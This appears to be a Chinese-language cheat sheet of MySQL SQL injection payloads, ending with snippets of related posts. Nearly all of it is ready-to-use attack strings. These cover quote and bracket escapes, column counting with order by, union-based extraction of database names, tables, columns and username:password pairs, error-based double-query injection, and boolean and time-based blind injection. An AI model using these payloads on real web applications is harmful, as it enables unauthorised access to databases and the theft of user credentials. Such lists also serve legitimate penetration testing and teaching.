#常規注入'--+
' --%20'#
' %23
'and 1=1 --+
'and
1=2 --+
'and 1=2 union select * from admin --+
'and
1=2 union select * from user --+
'and 1=2 union select * from users --+
#爆字段長度
' order by 1 --+
'order by 2 --+
' order by 3 --+
'order by 4 --+
' order by 5 --+
'order by 6 --+
' order by 7 --+
'order by 8 --+
' order by 9 --+
'order by 10 --+
#爆資料庫資訊,這僅限於字段長度為1
'and
1=2 union all select version() --+
'and 1=2 union all select user() --+
'and
1=2 union all select database() --+#判斷作業系統
'and 1=2 union all select @@global.version_compile_os from mysql.user --+
#資料庫許可權,返回正常說明root許可權;
'and ord(mid(user(),1,1))=114 --+#爆資料
'and 1=2 union select user(),version(),database(),@@datadir,schema_name,current_user(),7,8,9,10 from information_schema.schemata limit 0,1 --+
'and
1=2 union select 1,2,3,table_name,5,6,7,8,9,10 from information_schema.tables where table_schema=database() limit 0,1--+
'and 1=2 union select 1,2,3,column_name,5,6,7,8,9,10 from information_schema.columns where table_name=table_name limit 0,1--+
'and
1=2 union select 1,2,3,group_concat(column_name),5,6,7,8,9,10 from information_schema.columns where table_name=table_name limit 0,1--+
'and 1=2 union select 1,2,3,group_concat(username),5,6,7,8,9,10 from table_name --+
'and
1=2 union select 1,2,3,group_concat(username,0x3a,password),5,6,7,8,9,10 from table_name --+#不使用注釋符
'and '1
'union select 1 and '1
'union select 1,2 and '1
'and 1=2 union select 1,version(),3 and '1
'or '1
#帶括號防注入
') --+
') --%20
') #
') %23
#雙引號防注入
"--+
"--%20"#
"%23
#雙引號+括號
") --+
") --%20
") #
") %23
#雙查詢輸入
#統計有多少字段
select count(*) from table_name;
#隨機數生成
select rand();
select rand()*4
;#浮點數
select floor(rand());
select floor(rand()*4
);#別名
select floor(rand()*4
) as query;
#分組select username,password from user group by username;
#兩次查詢
select(select database());
#連線字串concat(str1,str2)
select concat((select database()));
select concat(0x3a,0x3a,(select database()),0x3a,0x3a);
select concat(0x3a,0x3a,(select database()),0x3a,0x3a) as query;
select concat(0x3a,0x3a,(select database()),0x3a,floor(rand()*2
)) as query;
select concat(0x3a,0x3a,(select database()),0x3a,floor(rand()*2
)) as query from user;
select count(*),concat(0x3a,0x3a,(select database()),0x3a,floor(rand()*2
)) as query from user group by query;
select count(*),concat(0x3a,0x3a,(select user()),0x3a,floor(rand()*2
)) as query from user group by query;
select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,floor(rand()*2
)) as query from user group by query;
'and (select 1 from (select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,floor(rand()*2)) as query from user group by query) as test) --+
'and
1=2 union (select * from (select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,floor(rand()*2)) as query from user group by query) as test) --+#盲注
#bool型盲注
select database();
#判斷長度
select length(database());
#擷取字串substr(str,num1,num2) num1:從第幾個開始取;num2:取多少個
select substr(database(),
1,1);
#ascii碼
select ascii(substr(database(),
1,1));
'and 1<2 --+
'and (ascii(substr((select database()),1,1)))=98--+#時間型盲注
#睡眠select sleep(1);
#進行判斷
select if((select database())="
bloodzero",sleep(10),null);
'and sleep(10) --+
'and if((select database())="
bloodzero",sleep(10),null)--+
SQL注入語句
對於sql語句注入來說 最重要的是利用其系統已存在的乙個information.schema 其中schemata是用來查詢庫名稱 tables用來查詢表名稱 columns用來查詢列名稱 order by語句用來判斷當前庫的列數 select用來查詢庫中的資訊 關於sql注入的相關流程 1.首先判...
MYSQL注入語句
union select 1,1,1,1,1 order by 13 union select 1,2,3,4,11,12,13 from admin union select 1,version 3,13 from admin union select 1,username,3,13 from a...
mysql 注入語句
檢視mysql中所有的使用者及許可權 只有root許可權才能看 union select 1,2,3 失敗 union select 1,2,3,4 成功 檢視該使用者的所有資料庫 union select group concat schema name 2,3,4 from informatio...